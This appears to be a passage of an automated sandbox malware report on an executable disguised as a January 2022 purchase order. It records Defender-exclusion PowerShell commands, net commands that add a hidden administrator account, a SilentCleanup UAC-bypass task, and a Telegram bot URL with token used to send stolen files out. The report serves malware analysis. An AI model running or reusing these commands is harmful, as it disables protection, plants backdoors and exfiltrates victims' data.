                      Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/
                      Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument-----
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: #NEW ORDER FOR JANUARY 2022.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDEJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_058144F0
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0581E3D8
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_05817589
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_05817598
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_05816E00
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_081139E0
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0811C478
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_081139D4
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08113B2C
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0811AB58
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08113C0B
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08112CA0
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08112CE8
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08110E90
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08110E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 31_2_01884860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 31_2_01884770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 31_2_0188DA00
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F016C
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F50C0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F26E0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F5D08
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F04BF
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F50B1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F5CF8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F04C8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F0F30
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E8274
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EEE10
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF918
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E5658
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078ED4D8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E8268
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EE268
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EE278
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E71D0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E9030
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EEDD8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF8E0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF808
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A1568
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A3128
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A5700
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A0787
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A01A8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A0199
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A6348
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A6338
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A0F00
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A56F0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A0EC7
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EAF0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878FA90
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_08788274
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878D4D8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878F9E3
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878FA5F
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EAE0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_08789030
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_08788268
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_08785658
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_013A4860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_013A4770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_013ADA00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E6C68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E7538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E94F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E2561
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E2670
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719160313.0000000000EBA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualStudio.Language.Intellisense.dllT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719405918.00000000012F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730697748.00000000036E3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: get_OriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: backupOfOriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: originalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameComSvcConfig.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: #NEW ORDER FOR JANUARY 2022.exeReversingLabs: Detection: 18%
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile read: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeJump to behavior
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\net1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
